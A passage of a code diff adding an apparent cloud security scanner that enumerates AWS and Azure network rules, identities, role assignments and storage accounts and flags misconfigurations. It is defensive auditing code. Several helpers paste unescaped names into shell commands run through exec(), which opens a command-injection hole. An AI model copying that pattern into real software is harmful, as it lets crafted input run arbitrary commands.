+    } catch (err) {
+      log.debug("AWS command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  function analyzeSecurityGroupRules(sg: CloudScanTypes.SecurityGroup): void {
+    for (const rule of sg.rules) {
+      if (rule.direction !== "inbound") continue
+      if (!rule.isPublic) continue
+
+      // Check for unrestricted access (all ports)
+      if (rule.protocol === "-1" || (!rule.portRange && rule.protocol !== "icmp")) {
+        rule.issues.push("Allows ALL traffic from public internet")
+      }
+
+      // Check for sensitive ports
+      if (rule.portRange) {
+        for (const [port, serviceName] of Object.entries(CloudScanTypes.SENSITIVE_PORTS)) {
+          const portNum = parseInt(port, 10)
+          if (portNum >= rule.portRange.from && portNum <= rule.portRange.to) {
+            rule.issues.push(`Exposes ${serviceName} (port ${portNum}) to public internet`)
+          }
+        }
+      }
+
+      // Check for wide port ranges
+      if (rule.portRange && rule.portRange.to - rule.portRange.from > 100) {
+        rule.issues.push(
+          `Wide port range (${rule.portRange.from}-${rule.portRange.to}) exposed to public internet`
+        )
+      }
+    }
+  }
+
+  function analyzeSecurityGroupsSecurity(
+    scanID: string,
+    securityGroups: CloudScanTypes.SecurityGroup[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const sg of securityGroups) {
+      // Check for unrestricted access
+      if (sg.hasUnrestrictedIngress) {
+        findings.push(createFinding(
+          scanID,
+          "critical",
+          "Security Group Allows Unrestricted Access",
+          `Security group ${sg.name} (${sg.id}) allows unrestricted inbound access from the internet.`,
+          sg
+        ))
+      }
+
+      // Check for specific sensitive ports
+      const sensitivePortsExposed = new Set<string>()
+
+      for (const rule of sg.rules) {
+        if (rule.direction !== "inbound" || !rule.isPublic) continue
+
+        for (const issue of rule.issues) {
+          if (issue.includes("Exposes")) {
+            const match = issue.match(/Exposes (\w+)/)
+            if (match) sensitivePortsExposed.add(match[1])
+          }
+        }
+      }
+
+      // Create findings for exposed sensitive services
+      for (const service of sensitivePortsExposed) {
+        let severity: CloudScanTypes.Severity = "medium"
+        if (["SSH", "RDP", "Telnet", "SMB"].includes(service)) {
+          severity = "high"
+        } else if (["MySQL", "PostgreSQL", "MSSQL", "MongoDB", "Redis"].includes(service)) {
+          severity = "critical"
+        }
+
+        findings.push(createFinding(
+          scanID,
+          severity,
+          `${service} Exposed to Internet`,
+          `Security group ${sg.name} (${sg.id}) exposes ${service} to the public internet.`,
+          sg
+        ))
+      }
+
+      // Check for default VPC security groups with rules
+      if (sg.name === "default" && sg.rules.length > 0) {
+        const hasNonDefaultRules = sg.rules.some(
+          (r) => r.direction === "inbound" && r.source !== sg.id
+        )
+        if (hasNonDefaultRules) {
+          findings.push(createFinding(
+            scanID,
+            "low",
+            "Default Security Group Has Custom Rules",
+            `Default security group in VPC ${sg.vpcId} has custom inbound rules. Best practice is to keep default security groups empty.`,
+            sg
+          ))
+        }
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    sg: CloudScanTypes.SecurityGroup
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_sg_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      region: sg.region,
+      severity,
+      title,
+      description,
+      resourceType: "security-group",
+      resourceId: sg.id,
+      category: "network",
+      complianceFrameworks: ["cis", "pci-dss"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "network",
+      resourceType: "security-group",
+      resourceId: sg.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/azure/index.ts b/packages/opencode/src/pentest/cloudscan/azure/index.ts
new file mode 100644
index 00000000000..e6d44c48cce
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/azure/index.ts
@@ -0,0 +1,19 @@
+/**
+ * @fileoverview Azure Cloud Security Module
+ *
+ * Azure-specific security scanning capabilities.
+ *
+ * @module pentest/cloudscan/azure
+ */
+
+export { AzureRBAC } from "./rbac"
+export type { AzureRBACOptions, AzureRBACResult } from "./rbac"
+
+export { AzureStorage } from "./storage"
+export type { AzureStorageOptions, AzureStorageResult } from "./storage"
+
+export { AzureNSG } from "./nsg"
+export type { AzureNSGOptions, AzureNSGResult } from "./nsg"
+
+export { AzureVM } from "./vm"
+export type { AzureVMOptions, AzureVMResult } from "./vm"
diff --git a/packages/opencode/src/pentest/cloudscan/azure/nsg.ts b/packages/opencode/src/pentest/cloudscan/azure/nsg.ts
new file mode 100644
index 00000000000..0e0c44b8658
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/azure/nsg.ts
@@ -0,0 +1,343 @@
+/**
+ * @fileoverview Azure Network Security Groups Analysis
+ *
+ * NSG enumeration and security analysis for Azure.
+ *
+ * @module pentest/cloudscan/azure/nsg
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AzureCLIParser } from "../parsers/azure-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.azure.nsg" })
+
+/**
+ * Azure NSG options.
+ */
+export interface AzureNSGOptions {
+  subscriptionId?: string
+  resourceGroup?: string
+  timeout?: number
+}
+
+/**
+ * Azure NSG result.
+ */
+export interface AzureNSGResult {
+  nsgs: CloudScanTypes.SecurityGroup[]
+  vnets: CloudScanTypes.VirtualNetwork[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * Azure NSG namespace.
+ */
+export namespace AzureNSG {
+  /**
+   * Enumerate all NSGs and analyze their rules.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AzureNSGOptions = {}
+  ): Promise<AzureNSGResult> {
+    const result: AzureNSGResult = {
+      nsgs: [],
+      vnets: [],
+      findings: [],
+      issues: [],
+    }
+
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+    const rgFlag = options.resourceGroup ? `--resource-group ${options.resourceGroup}` : ""
+
+    try {
+      // Enumerate NSGs
+      log.info("Enumerating Azure NSGs")
+      const nsgOutput = await runAzureCommand(
+        `az network nsg list ${subscriptionFlag} ${rgFlag} --output json`,
+        options.timeout
+      )
+
+      if (nsgOutput) {
+        result.nsgs = AzureCLIParser.parseNetworkSecurityGroups(nsgOutput)
+        result.findings.push(`Found ${result.nsgs.length} Network Security Groups`)
+
+        for (const nsg of result.nsgs) {
+          Bus.publish(CloudScanEvents.SecurityGroupFound, {
+            scanID,
+            provider: "azure",
+            groupId: nsg.id,
+            groupName: nsg.name,
+            ruleCount: nsg.rules.length,
+            hasPublicIngress: nsg.hasPublicIngress,
+          })
+
+          // Emit events for insecure rules
+          for (const rule of nsg.rules) {
+            if (rule.issues.length > 0) {
+              const portStr = rule.portRange
+                ? rule.portRange.from === rule.portRange.to
+                  ? rule.portRange.from.toString()
+                  : `${rule.portRange.from}-${rule.portRange.to}`
+                : "all"
+
+              for (const issue of rule.issues) {
+                Bus.publish(CloudScanEvents.InsecureRuleFound, {
+                  scanID,
+                  provider: "azure",
+                  groupId: nsg.id,
+                  groupName: nsg.name,
+                  direction: rule.direction,
+                  protocol: rule.protocol,
+                  port: portStr,
+                  source: rule.source,
+                  issue,
+                })
+              }
+            }
+          }
+        }
+      }
+
+      // Enumerate VNets
+      log.info("Enumerating Azure VNets")
+      const vnetOutput = await runAzureCommand(
+        `az network vnet list ${subscriptionFlag} ${rgFlag} --output json`,
+        options.timeout
+      )
+
+      if (vnetOutput) {
+        result.vnets = AzureCLIParser.parseVirtualNetworks(vnetOutput)
+        result.findings.push(`Found ${result.vnets.length} Virtual Networks`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeNSGSecurity(scanID, result.nsgs)
+
+    } catch (err) {
+      log.error("Azure NSG enumeration failed", { error: String(err) })
+      result.findings.push(`Azure NSG enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get NSGs with public ingress.
+   */
+  export async function getNSGsWithPublicIngress(
+    options: AzureNSGOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { nsgs } = await enumerate("check", options)
+    return nsgs.filter((nsg) => nsg.hasPublicIngress)
+  }
+
+  /**
+   * Get NSGs allowing specific port from internet.
+   */
+  export async function getNSGsAllowingPort(
+    port: number,
+    options: AzureNSGOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { nsgs } = await enumerate("check", options)
+
+    return nsgs.filter((nsg) =>
+      nsg.rules.some(
+        (rule) =>
+          rule.direction === "inbound" &&
+          rule.isPublic &&
+          rule.portRange &&
+          port >= rule.portRange.from &&
+          port <= rule.portRange.to
+      )
+    )
+  }
+
+  /**
+   * Get unassociated NSGs.
+   */
+  export async function getUnassociatedNSGs(
+    options: AzureNSGOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { nsgs } = await enumerate("check", options)
+    return nsgs.filter((nsg) => nsg.attachedResources.length === 0)
+  }
+
+  /**
+   * Check a specific NSG for issues.
+   */
+  export async function check(
+    nsgName: string,
+    resourceGroup: string,
+    options: AzureNSGOptions = {}
+  ): Promise<{
+    nsg: CloudScanTypes.SecurityGroup | null
+    issues: string[]
+  }> {
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+
+    try {
+      const output = await runAzureCommand(
+        `az network nsg show --name ${nsgName} --resource-group ${resourceGroup} ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { nsg: null, issues: ["Failed to get NSG"] }
+      }
+
+      const nsgs = AzureCLIParser.parseNetworkSecurityGroups(`[${output}]`)
+      if (nsgs.length === 0) {
+        return { nsg: null, issues: ["NSG not found"] }
+      }
+
+      const nsg = nsgs[0]
+      analyzeNSGRules(nsg)
+
+      const issues: string[] = []
+      for (const rule of nsg.rules) {
+        issues.push(...rule.issues)
+      }
+
+      return { nsg, issues }
+    } catch (err) {
+      log.error("Failed to check NSG", { nsgName, error: String(err) })
+      return { nsg: null, issues: [String(err)] }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAzureCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("Azure command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  function analyzeNSGRules(nsg: CloudScanTypes.SecurityGroup): void {
+    for (const rule of nsg.rules) {
+      if (rule.direction !== "inbound") continue
+      if (!rule.isPublic) continue
+
+      // Check for unrestricted access (all ports)
+      if (rule.protocol === "*" && !rule.portRange) {
+        rule.issues.push("Allows ALL traffic from public internet")
+      }
+
+      // Check for sensitive ports
+      if (rule.portRange) {
+        for (const [port, serviceName] of Object.entries(CloudScanTypes.SENSITIVE_PORTS)) {
+          const portNum = parseInt(port, 10)
+          if (portNum >= rule.portRange.from && portNum <= rule.portRange.to) {
+            rule.issues.push(`Exposes ${serviceName} (port ${portNum}) to public internet`)
+          }
+        }
+      }
+    }
+  }
+
+  function analyzeNSGSecurity(
+    scanID: string,
+    nsgs: CloudScanTypes.SecurityGroup[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const nsg of nsgs) {
+      // Analyze rules
+      analyzeNSGRules(nsg)
+
+      // Unrestricted access
+      if (nsg.hasUnrestrictedIngress) {
+        findings.push(createFinding(
+          scanID,
+          "critical",
+          "NSG Allows Unrestricted Access",
+          `NSG ${nsg.name} allows unrestricted inbound access from the internet.`,
+          nsg
+        ))
+      }
+
+      // Check for specific sensitive ports
+      const sensitivePortsExposed = new Set<string>()
+
+      for (const rule of nsg.rules) {
+        if (rule.direction !== "inbound" || !rule.isPublic) continue
+
+        for (const issue of rule.issues) {
+          if (issue.includes("Exposes")) {
+            const match = issue.match(/Exposes (\w+)/)
+            if (match) sensitivePortsExposed.add(match[1])
+          }
+        }
+      }
+
+      for (const service of sensitivePortsExposed) {
+        let severity: CloudScanTypes.Severity = "medium"
+        if (["SSH", "RDP", "SMB"].includes(service)) {
+          severity = "high"
+        } else if (["MySQL", "PostgreSQL", "MSSQL", "MongoDB", "Redis"].includes(service)) {
+          severity = "critical"
+        }
+
+        findings.push(createFinding(
+          scanID,
+          severity,
+          `${service} Exposed to Internet`,
+          `NSG ${nsg.name} exposes ${service} to the public internet.`,
+          nsg
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    nsg: CloudScanTypes.SecurityGroup
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `azure_nsg_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "azure",
+      region: nsg.region,
+      severity,
+      title,
+      description,
+      resourceType: "security-group",
+      resourceId: nsg.id,
+      category: "network",
+      complianceFrameworks: ["cis", "azure-security-benchmark"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "azure",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "network",
+      resourceType: "security-group",
+      resourceId: nsg.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/azure/rbac.ts b/packages/opencode/src/pentest/cloudscan/azure/rbac.ts
new file mode 100644
index 00000000000..34fecf37458
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/azure/rbac.ts
@@ -0,0 +1,307 @@
+/**
+ * @fileoverview Azure RBAC Analysis
+ *
+ * Azure role-based access control enumeration and analysis.
+ *
+ * @module pentest/cloudscan/azure/rbac
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AzureCLIParser } from "../parsers/azure-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.azure.rbac" })
+
+/**
+ * Azure RBAC options.
+ */
+export interface AzureRBACOptions {
+  subscriptionId?: string
+  resourceGroup?: string
+  timeout?: number
+}
+
+/**
+ * Azure RBAC result.
+ */
+export interface AzureRBACResult {
+  users: CloudScanTypes.IAMPrincipal[]
+  groups: CloudScanTypes.IAMGroup[]
+  servicePrincipals: CloudScanTypes.IAMPrincipal[]
+  roles: CloudScanTypes.IAMRole[]
+  assignments: Array<{
+    principalId: string
+    roleDefinitionId: string
+    roleName?: string
+    scope: string
+  }>
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * Azure RBAC namespace.
+ */
+export namespace AzureRBAC {
+  /**
+   * Enumerate all RBAC resources.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AzureRBACOptions = {}
+  ): Promise<AzureRBACResult> {
+    const result: AzureRBACResult = {
+      users: [],
+      groups: [],
+      servicePrincipals: [],
+      roles: [],
+      assignments: [],
+      findings: [],
+      issues: [],
+    }
+
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+
+    try {
+      // Enumerate Azure AD users
+      log.info("Enumerating Azure AD users")
+      const usersOutput = await runAzureCommand(`az ad user list --output json`, options.timeout)
+      if (usersOutput) {
+        result.users = AzureCLIParser.parseUsers(usersOutput)
+
+        for (const user of result.users) {
+          Bus.publish(CloudScanEvents.IAMUserFound, {
+            scanID,
+            provider: "azure",
+            userName: user.name,
+            userId: user.id,
+            mfaEnabled: user.mfaEnabled,
+            accessKeyCount: 0,
+            hasConsoleAccess: true,
+          })
+        }
+
+        result.findings.push(`Found ${result.users.length} Azure AD users`)
+      }
+
+      // Enumerate Azure AD groups
+      log.info("Enumerating Azure AD groups")
+      const groupsOutput = await runAzureCommand(`az ad group list --output json`, options.timeout)
+      if (groupsOutput) {
+        result.groups = AzureCLIParser.parseGroups(groupsOutput)
+        result.findings.push(`Found ${result.groups.length} Azure AD groups`)
+      }
+
+      // Enumerate service principals
+      log.info("Enumerating service principals")
+      const spOutput = await runAzureCommand(`az ad sp list --all --output json`, options.timeout)
+      if (spOutput) {
+        result.servicePrincipals = AzureCLIParser.parseServicePrincipals(spOutput)
+        result.findings.push(`Found ${result.servicePrincipals.length} service principals`)
+      }
+
+      // Enumerate role definitions
+      log.info("Enumerating role definitions")
+      const rolesOutput = await runAzureCommand(
+        `az role definition list --custom-role-only true ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+      if (rolesOutput) {
+        result.roles = AzureCLIParser.parseRoleDefinitions(rolesOutput)
+        result.findings.push(`Found ${result.roles.length} custom role definitions`)
+      }
+
+      // Enumerate role assignments
+      log.info("Enumerating role assignments")
+      const assignmentsOutput = await runAzureCommand(
+        `az role assignment list --all ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+      if (assignmentsOutput) {
+        result.assignments = AzureCLIParser.parseRoleAssignments(assignmentsOutput)
+        result.findings.push(`Found ${result.assignments.length} role assignments`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeRBACSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("Azure RBAC enumeration failed", { error: String(err) })
+      result.findings.push(`Azure RBAC enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get service principals with expiring credentials.
+   */
+  export async function getServicePrincipalsWithExpiringCredentials(
+    daysUntilExpiry: number = 30,
+    options: AzureRBACOptions = {}
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    const { servicePrincipals } = await enumerate("check", options)
+    const cutoff = Date.now() + daysUntilExpiry * 24 * 60 * 60 * 1000
+
+    return servicePrincipals.filter((sp) =>
+      sp.accessKeys.some(
+        (k) => k.status === "active" && k.createdAt && k.createdAt < cutoff
+      )
+    )
+  }
+
+  /**
+   * Get users with owner role at subscription level.
+   */
+  export async function getSubscriptionOwners(
+    options: AzureRBACOptions = {}
+  ): Promise<string[]> {
+    const { assignments } = await enumerate("check", options)
+
+    return assignments
+      .filter(
+        (a) =>
+          a.roleName?.toLowerCase().includes("owner") &&
+          a.scope.split("/").length <= 3 // Subscription level
+      )
+      .map((a) => a.principalId)
+  }
+
+  /**
+   * Get assignments with contributor or owner role.
+   */
+  export async function getHighPrivilegeAssignments(
+    options: AzureRBACOptions = {}
+  ): Promise<AzureRBACResult["assignments"]> {
+    const { assignments } = await enumerate("check", options)
+
+    const highPrivilegeRoles = ["owner", "contributor", "user access administrator"]
+
+    return assignments.filter((a) =>
+      highPrivilegeRoles.some((r) => a.roleName?.toLowerCase().includes(r))
+    )
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAzureCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("Azure command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  function analyzeRBACSecurity(
+    scanID: string,
+    result: AzureRBACResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check for service principals with expired credentials
+    for (const sp of result.servicePrincipals) {
+      const expiredKeys = sp.accessKeys.filter((k) => k.status === "inactive")
+      if (expiredKeys.length > 0) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "Service Principal Has Expired Credentials",
+          `Service principal ${sp.name} has ${expiredKeys.length} expired credential(s).`,
+          "service-account",
+          sp.id
+        ))
+      }
+    }
+
+    // Check for subscription-level owner assignments
+    const subscriptionOwnerCount = result.assignments.filter(
+      (a) =>
+        a.roleName?.toLowerCase().includes("owner") &&
+        a.scope.split("/").length <= 3
+    ).length
+
+    if (subscriptionOwnerCount > 3) {
+      findings.push(createFinding(
+        scanID,
+        "medium",
+        "Multiple Subscription Owners",
+        `There are ${subscriptionOwnerCount} principals with Owner role at subscription level. Consider limiting owner access.`,
+        "role",
+        "subscription-owners"
+      ))
+    }
+
+    // Check for custom roles with high privileges
+    for (const role of result.roles) {
+      const highPrivActions = (role.attachedPolicies as string[]).filter(
+        (p) => p.includes("*") || p.includes("/write") || p.includes("/delete")
+      )
+
+      if (highPrivActions.length > 5) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "Custom Role With Broad Permissions",
+          `Custom role ${role.name} has ${highPrivActions.length} high-privilege actions.`,
+          "role",
+          role.id
+        ))
+
+        Bus.publish(CloudScanEvents.IAMPolicyIssue, {
+          scanID,
+          provider: "azure",
+          policyName: role.name,
+          issue: `Custom role has ${highPrivActions.length} high-privilege actions`,
+          severity: "medium",
+        })
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    resourceType: CloudScanTypes.ResourceType,
+    resourceId: string
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `azure_rbac_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "azure",
+      severity,
+      title,
+      description,
+      resourceType,
+      resourceId,
+      category: "iam",
+      complianceFrameworks: ["cis", "azure-security-benchmark"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "azure",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "iam",
+      resourceType,
+      resourceId,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/azure/storage.ts b/packages/opencode/src/pentest/cloudscan/azure/storage.ts
new file mode 100644
index 00000000000..b20c29f5435
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/azure/storage.ts
@@ -0,0 +1,365 @@
+/**
+ * @fileoverview Azure Storage Security Analysis
+ *
+ * Azure Blob Storage enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/azure/storage
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AzureCLIParser } from "../parsers/azure-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.azure.storage" })
+
+/**
+ * Azure Storage options.
+ */
+export interface AzureStorageOptions {
+  subscriptionId?: string
+  resourceGroup?: string
+  timeout?: number
+}
+
+/**
+ * Azure Storage result.
+ */
+export interface AzureStorageResult {
+  storageAccounts: CloudScanTypes.StorageBucket[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * Azure Storage namespace.
+ */
+export namespace AzureStorage {
+  /**
+   * Enumerate all storage accounts and their security settings.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AzureStorageOptions = {}
+  ): Promise<AzureStorageResult> {
+    const result: AzureStorageResult = {
+      storageAccounts: [],
+      findings: [],
+      issues: [],
+    }
+
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+    const rgFlag = options.resourceGroup ? `--resource-group ${options.resourceGroup}` : ""
+
+    try {
+      log.info("Enumerating Azure storage accounts")
+      const output = await runAzureCommand(
+        `az storage account list ${subscriptionFlag} ${rgFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        result.findings.push("Failed to list Azure storage accounts")
+        return result
+      }
+
+      const partialAccounts = AzureCLIParser.parseStorageAccounts(output)
+      result.findings.push(`Found ${partialAccounts.length} storage accounts`)
+
+      // Enrich each storage account
+      for (const partial of partialAccounts) {
+        const account = await enrichStorageAccount(partial, subscriptionFlag, options)
+        result.storageAccounts.push(account as CloudScanTypes.StorageBucket)
+
+        Bus.publish(CloudScanEvents.BucketFound, {
+          scanID,
+          provider: "azure",
+          bucketName: account.name!,
+          region: account.region,
+          isPublic: !account.publicAccessBlocked,
+          hasEncryption: account.encryption?.enabled || false,
+          hasVersioning: account.versioningEnabled || false,
+        })
+
+        // Check for public access
+        if (!account.publicAccessBlocked) {
+          Bus.publish(CloudScanEvents.PublicBucketFound, {
+            scanID,
+            provider: "azure",
+            bucketName: account.name!,
+            accessLevel: account.accessLevel || "public-read",
+            reason: "Blob public access is enabled",
+          })
+        }
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeStorageSecurity(scanID, result.storageAccounts)
+
+    } catch (err) {
+      log.error("Azure storage enumeration failed", { error: String(err) })
+      result.findings.push(`Azure storage enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get storage accounts with public access enabled.
+   */
+  export async function getPublicStorageAccounts(
+    options: AzureStorageOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { storageAccounts } = await enumerate("check", options)
+    return storageAccounts.filter((s) => !s.publicAccessBlocked)
+  }
+
+  /**
+   * Get storage accounts without encryption.
+   */
+  export async function getUnencryptedStorageAccounts(
+    options: AzureStorageOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { storageAccounts } = await enumerate("check", options)
+    return storageAccounts.filter((s) => !s.encryption?.enabled)
+  }
+
+  /**
+   * Get storage accounts without secure transfer.
+   */
+  export async function getInsecureTransferStorageAccounts(
+    options: AzureStorageOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+
+    try {
+      const output = await runAzureCommand(
+        `az storage account list ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) return []
+
+      const data = JSON.parse(output)
+      const insecure: CloudScanTypes.StorageBucket[] = []
+
+      for (const account of data) {
+        if (!account.enableHttpsTrafficOnly) {
+          insecure.push({
+            id: account.id || account.name,
+            name: account.name,
+            provider: "azure",
+            region: account.location,
+            accessLevel: "private",
+            publicAccessBlocked: !account.allowBlobPublicAccess,
+            aclEnabled: false,
+            acls: [],
+            issues: ["HTTPS traffic not required"],
+            versioningEnabled: false,
+            loggingEnabled: false,
+            mfaDeleteRequired: false,
+            hasPolicyPublicAccess: false,
+          })
+        }
+      }
+
+      return insecure
+    } catch (err) {
+      log.error("Failed to check secure transfer", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * List containers in a storage account.
+   */
+  export async function listContainers(
+    accountName: string,
+    options: AzureStorageOptions = {}
+  ): Promise<Array<{
+    name: string
+    publicAccess: string | null
+  }>> {
+    try {
+      const output = await runAzureCommand(
+        `az storage container list --account-name ${accountName} --auth-mode login --output json`,
+        options.timeout
+      )
+
+      if (!output) return []
+
+      return AzureCLIParser.parseStorageContainers(output)
+    } catch (err) {
+      log.debug("Failed to list containers", { accountName, error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAzureCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("Azure command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichStorageAccount(
+    partial: Partial<CloudScanTypes.StorageBucket>,
+    subscriptionFlag: string,
+    options: AzureStorageOptions
+  ): Promise<Partial<CloudScanTypes.StorageBucket>> {
+    const account = { ...partial }
+
+    try {
+      // Get detailed account info
+      const detailOutput = await runAzureCommand(
+        `az storage account show --name ${partial.name} ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (detailOutput) {
+        const data = JSON.parse(detailOutput)
+
+        account.publicAccessBlocked = !data.allowBlobPublicAccess
+        account.accessLevel = data.allowBlobPublicAccess ? "public-read" : "private"
+
+        // Check encryption
+        account.encryption = {
+          enabled: data.encryption?.services?.blob?.enabled ?? true,
+          algorithm: data.encryption?.services?.blob?.keyType,
+          customerManaged: data.encryption?.keySource === "Microsoft.Keyvault",
+        }
+
+        // Check network rules
+        if (data.networkRuleSet?.defaultAction === "Allow") {
+          account.issues = account.issues || []
+          account.issues.push("Network access is open to all networks")
+        }
+
+        // Check minimum TLS version
+        if (data.minimumTlsVersion !== "TLS1_2") {
+          account.issues = account.issues || []
+          account.issues.push(`Minimum TLS version is ${data.minimumTlsVersion || "not set"}`)
+        }
+
+        // Check secure transfer
+        if (!data.enableHttpsTrafficOnly) {
+          account.issues = account.issues || []
+          account.issues.push("HTTPS traffic not required")
+        }
+      }
+
+      // Try to get blob service properties for versioning
+      const blobPropsOutput = await runAzureCommand(
+        `az storage account blob-service-properties show --account-name ${partial.name} ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (blobPropsOutput) {
+        const props = JSON.parse(blobPropsOutput)
+        account.versioningEnabled = props.isVersioningEnabled ?? false
+      }
+    } catch (err) {
+      log.debug("Failed to enrich storage account", { name: partial.name, error: String(err) })
+    }
+
+    return account
+  }
+
+  function analyzeStorageSecurity(
+    scanID: string,
+    accounts: CloudScanTypes.StorageBucket[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const account of accounts) {
+      // Public access enabled
+      if (!account.publicAccessBlocked) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "Azure Storage Account Allows Public Access",
+          `Storage account ${account.name} allows public blob access.`,
+          account
+        ))
+      }
+
+      // Check for issues
+      for (const issue of account.issues || []) {
+        let severity: CloudScanTypes.Severity = "medium"
+        if (issue.includes("HTTPS") || issue.includes("TLS")) {
+          severity = "high"
+        } else if (issue.includes("network")) {
+          severity = "medium"
+        }
+
+        findings.push(createFinding(
+          scanID,
+          severity,
+          `Azure Storage Account Security Issue`,
+          `Storage account ${account.name}: ${issue}`,
+          account
+        ))
+      }
+
